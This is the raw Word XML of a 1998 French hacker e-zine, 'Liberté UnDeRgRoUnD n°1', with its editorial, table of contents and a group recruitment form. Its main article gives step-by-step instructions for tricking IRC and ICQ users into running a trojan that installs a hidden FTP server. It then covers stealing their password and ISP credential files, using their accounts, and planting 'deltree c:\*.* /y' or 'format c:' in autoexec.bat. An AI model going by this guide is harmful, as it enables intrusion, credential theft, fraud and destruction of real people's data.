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265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1844675" cy="1276985"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"/>
                <wp:docPr id="1" name="Frame1"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1844675" cy="1276985"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect"/>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF">
                            <a:alpha val="0"/>
                          </a:srgbClr>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="Normal"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                              <w:t>Liberté</w:t>
                            </w:r>
                          </w:p>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="Normal"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                              <w:t>UnDeRgRoUnD n°1</w:t>
                            </w:r>
                          </w:p>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="Normal"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                              <w:t>(1.2)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr anchor="t" lIns="12700" tIns="12700" rIns="12700" bIns="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect fillcolor="#FFFFFF" style="position:absolute;rotation:-0;width:145.25pt;height:100.55pt;mso-wrap-distance-left:7.1pt;mso-wrap-distance-right:7.1pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:-6.95pt;mso-position-vertical-relative:text;margin-left:169.75pt;mso-position-horizontal:center;mso-position-horizontal-relative:margin">
                <v:fill opacity="0f"/>
                <v:textbox inset="0.0138888888888889in,0.0138888888888889in,0.0138888888888889in,0in">
                  <w:txbxContent>
                    <w:p>
                      <w:pPr>
                        <w:pStyle w:val="Normal"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                        </w:rPr>
                        <w:t>Liberté</w:t>
                      </w:r>
                    </w:p>
                    <w:p>
                      <w:pPr>
                        <w:pStyle w:val="Normal"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                        </w:rPr>
                        <w:t>UnDeRgRoUnD n°1</w:t>
                      </w:r>
                    </w:p>
                    <w:p>
                      <w:pPr>
                        <w:pStyle w:val="Normal"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                        </w:rPr>
                        <w:t>(1.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ettenschweiler" w:hAnsi="Haettenschweiler" w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Avril / mai 1998 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler" w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>©G.L.U.F. &amp; BoBmArLeY</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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>[ DiScLaiMeR : ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>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 lecture de cette publication électronique implique la lecture de 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isclaim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e texte est fourni au lecteur à titre purement éducatif et informati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n aucun cas les auteurs n'incitent ce dernier au non respect de la loi,</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ous toute forme qu'il so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e texte est destiné uniquement aux personnes auxquelles les auteurs l'o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emis, en conséquence il peut être considéré comme une communication privé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des auteurs avec ces personn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oute organisation représentant un ordre quelconque ou toute agence d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enseignement est considérée comme étrangère aux personnes autorisées à li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ce texte et en conséquence aucune poursuite ne pourra être faite contre l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uteurs pour leur publication.</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Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Cette version à été mise à jour le 6 juillet 1998 because le G.L.U.F. à maintenant une page :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HTTP ://i-France.com/gluf/gluf.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>J’ai donc supprimé la version du contrôleur (ftp666) livré avec la première version du zine car elle se trouve sur la page avec celle de Lucyfer (nettement améliorée).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Pour le rechargeur de carte, y’a un problème, voir L.U. n°2 qui sortira bientôt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>BoBmArLeY</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 eDiTo : ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>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alut à tous ! Ce que vous êtes entrain de lire est un nouveau E-Zine UnDeRgRoUnD Francophone. Cet E-Zine est au format Word car je pense que vous avez tous une version (au moins piratée ! ;o) ) de ce logiciel, même si c’est un produit de Mr Microsoft ! La présentation est mieux que en fichier texte normal, mais bon, pt’et que je ferais une version en TX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u fait, moi c’est BoBmArLeY, je sais que c’est pô très original comme pseudo mais je suis connu sous ce nom là sous IRC depuis longtemps alors g pô envie de change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 majorité des articles de ce premier numéro seront de moi, pour les prochains ça dépendra de vous ! Je ne suis pas un NeurAlien ou un CoD4, mais je serais très heureux si cet E-zine pouvait être le successeur de NoWay et NoRoute (Si vous les avez pas lus, ils sont disponibles sur ma page avec d’autres E-Zines Francophones: http ://www.village.cyberbrain.com/HLM/AurelSite/Aurelsit.htm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Ce Zine parlera de Hacking, Phreaking, Cracking, Musique, Drogues, Anarchie, Bons plans, etc.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n tout cas, n’hésitez pas à m’envoyer vos articles, je pense que je garderais le rôle d’Editeur et de regroupement des articles par contre, j’aurais besoin de diffuseurs ( qui pourraient mettre le Zine sur leurs pages, le diffuser par e-mail, par irc et icq ), mais je pense qu’il y aura bientôt une mailing list ou une icqlist :o) pour que vous puissiez vous abonner si le mag marche bie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us êtes invités à distribuer cet E-Zine à un maximum de personn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Normalement un nouveau Groupe (voir plus loin) collaborera à ce Zine, j’espère qu’il sortira un numéro environ tous les mois. Envoyez vos articles, documents, cracks,... à  aurel@hol.fr  ou par ICQ : 4130786.Voilà ! BONNE LECTURE ! ! ! :o)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S : Je vous conseille de supprimer la correction automatique de merde de Word si vous voulez pas voir pleins de trucs soulignés en rouge !</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pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>[ Sommaire : ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7583" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-77" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="70" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="354"/>
        <w:gridCol w:w="5121"/>
        <w:gridCol w:w="2108"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>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n°</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="51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Titre de l’article</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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Auteu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47" w:hanging="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
              </w:rPr>
              <w:t>1</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UUdecode : mode d’emploi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Le « Contrôleur » ou Comment Hacker Hyper facilement un PC sous Windaube 95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G.L.U.F. : Début d’un Group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Hacker le Serveur NT d’une Entreprise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ackdoo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Rechargez vos télécartes France Télécom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omment ne pas payer l’abonnement à H.O.L.</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t>Cours de Crack ( Protection  Keydisk, fichiers compactés, cheksum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t>RRf</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t>Nicolas le Jardinier et sa wEEd mAGiQU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t>m0sfe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Mes Utilitaires préférés ! (cracks et sérials offerts)</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ABONNEMENT (Gratos Bien sur !)</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1</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Remerciements, Salut &amp; FUCK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2</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ONCLUSION</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tc>
      </w:tr>
    </w:tbl>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1 ) UUdecode : mode d’emploi :</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us allez trouver dans ce mag des fichiers Uuencodés, ils commenceront par un truc comme ça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egin 644 azerty.ex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t finiront par un truc comme ça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n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um -r/size 22818/5677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l faudra selectionner tout de begin à end sum.... (je mettrais des pointillés avants et après), ensuite vous copiez, vous ouvrez le bloc notes, vous collez et vous enregistrez votre fichier sous azerty.uue par exemple. Maintenant Winzip lit les UUE, donc vous faites pareil que pour un zip.Néanmoins, je vous conseille le formidable Wincode (qui est en freeware en + !) que vous pourrez trouver à : http ://snappy-software.co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on voilà, normalement si vous êtes pô trop trop con vous devriez y arriver ! :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2 ) Le « contrôleur » ou Comment Hacker Hyper facilement un PC sous Windaube 95 ! :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>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a 2 façons de hacker super facilement une machine sous win95, la premiere, c’est celle de Pixel et Windaube décrite dans NoRoUte #4, elle a des avantages, car on peut faire executer des fichiers au Lamer sur son ordinateur avec REXEC.EXE (si vous etes sous NT) :o) , mais il faut que le mec soit en fichiers partagés :o(( , ce qui est très rare à part  quand il s’agit d’un réseau local.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t>La 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>ème</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t xml:space="preserve"> c’est le « contrôleur » :o))))))), ce truc la est trop dement ! Je vais vous expliquer un petit peu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us connaissez Serv-u ? Le logiciel sympa qui transforme votre DD en FTP.</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Imaginez qu’il s’execute a chaque demarrage de windows, configuré en port 666  Anonyme en prenant votre adresse IP comme adresse FTP et sans que vous le voyiez ! ! N’importe qui pourrait aller à sa guise sur vos DD, lecteurs CD et même les disquettes ! :o))) des que vous etes connectés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en, en fait le « Controleur » c’est ça, il installe un résident transparent pour la victim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onc, résumon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Vous envoyez le fichier install.exe à la victime (par irc ou icq, vous lui dites que c’est un anti-nuke ou un super nuker enfin n’importe quoi).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="284"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="566" w:hanging="566"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t>La victime execute le fichier, ça lui met un message d’erreur, elle vous dit : Ton file il foire !</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="284"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="566" w:hanging="566"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t>Vous savez qu’elle est maintenant totalement vulnérable à jamais !, vous prenez son adresse IP, si c’est sous irc, vous faites un /dns nickname et si c’est sur icq, vous allez dans ses infos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="284"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="566" w:hanging="566"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t>Une fois que vous avez l’adresse IP, vous prenez votre client FTP (Je vous conseille CuteFTP 2), vous vous connectez à l’adresse IP de la victime en port 666 et uniquement. Avec cuteftp ça bloque, il faut faire « Stop » puis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Norma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 refresh », une fenêtre Serv-u apparaît alors et vous cliquez ok ).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="284"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t>Now, vous pourrez aller a votre guise sur son DD dès qu’elle sera connectée (si c’est une victime ICQ, facile de voir quand elle est connectée !), vous pouvez lui piquez ses files, lui en rajouter, style si c’est un GROSCON, ds l’autoexec.bat vous pouvez mettre à la fi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CHO OF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L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CHO TU T’ES FAIT HACKER COMME UN GROS C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aus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 :\windows\command\deltree c :\*.* /y  ou format c :|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ilà.</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vous conseille de piquer tous les .pwl,.ini,etc... Si le mec a Infonie, piquez lui son Infonie.ini, vous le placez ds votre repertoire windows, vous installez un Kit Infonie, il va vous dire que c’est une mise a jour, vous pourrez alors vous connecter au frais du mec, retirer son courrier, etc... C possible avec d’autres trucs comme Wanadoo je croi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n peut aller à plusieurs sur un même micro, on a bien déliré avec [RoD01] et Atlanti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vous conseille d’ouvrir le fichier avec Winzip et de l’étudier, ça peut donner des idé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Si vous l’executez sur votre micro par mégarde, supprimez de vos repertoires Windows, Rundlls.exe, servu.ini, et supprimez dans le section [windows] de votre windows.ini load=closew.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à, le fichier je vais pas l’Uuencoder car il est trop gros, vous le trouverez a coté c’est install.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t>Bon Ben, Bon HACKING ! ! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;o))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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lang w:val="en-US"/>
        </w:rPr>
        <w:t>BoBmArLeY</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3 ) G.L.U.F. : Début d’un Group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viens de créer un nouveau groupe : G.L.U.F. (Groupement Libertaire Underground Francophone), on cherche vraiment beaucoup de membres, donc  n’hésitez pas à vous inscrire si vous êtes Bon en quelque chos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importe qui peut devenir membre, cependant vous devez remplir les conditions suivant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voir un accès à Interne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voir Irc.</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voir ICQ, il faudra rajouter (G.L.U.F.) après votre Pseud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voir des connaissances H/P/.....</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e pas être un big Lame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e pas être une Balance (ou un indic des V) ;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tre disponible pour des proje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enir sur le channel irc réservé aux membr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n cherche aussi des membres très actif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 très Bon Crackers/Décompileurs/Désassembleurs/Debuggers ! Vous devez nous envoyer 2 ou 3 cracks contenant le nom G.L.U.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 très Bon Hackers ! Vous devrez hacker ma page (Http ://www.village.cyberbrain.com/HLM/aurelsite/aurelsit.htm) en marquant un « Hacked By » et votre adresse e-mail ou ICQ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 très bon Coder (Assembleur et C++ apprécie !) mais si vous faites du delphi ça va .(envoyez un programme fait par vo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Un très bon Graphiste.(envoyez un logo G.L.U.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Un Spécialiste des réseaux UNIX, LINUX et NETWA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leins d’écrivains ! (pour les articles de ce zi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Un hebergement FTP Gratu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i vous voulez vous inscrire, remplissez le bon suivant, collez le ds un fichier TXT et e-mailez le à aurel@hol.fr ou pa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CQ : 413078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souhaite devenir membre du G.L.U.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 Pseudo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 UIN ICQ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 adresse e-mail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 URL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a spécialité (Cracking,....)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 Ag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 Sexe : M []    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souhaite devenir diffuseur du mag : OUI []   N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souhaite écrire des articles dans les prochains numéros de Liberté Underground :  OUI []    N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souhaite participer à la conception du Site G.L.U.F. : OUI []    N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ai une connexion permanente : OUI []   N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ettre un X ds les cases correspondan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recevrais toutes les informations importantes (# irc, animations, objectifs,...) par E-mail et recevrais des News chaque Semaine ainsi que la liste des nouveaux membr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4 ) Hacker le Serveur NT d’une Entreprise ! :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="40"/>
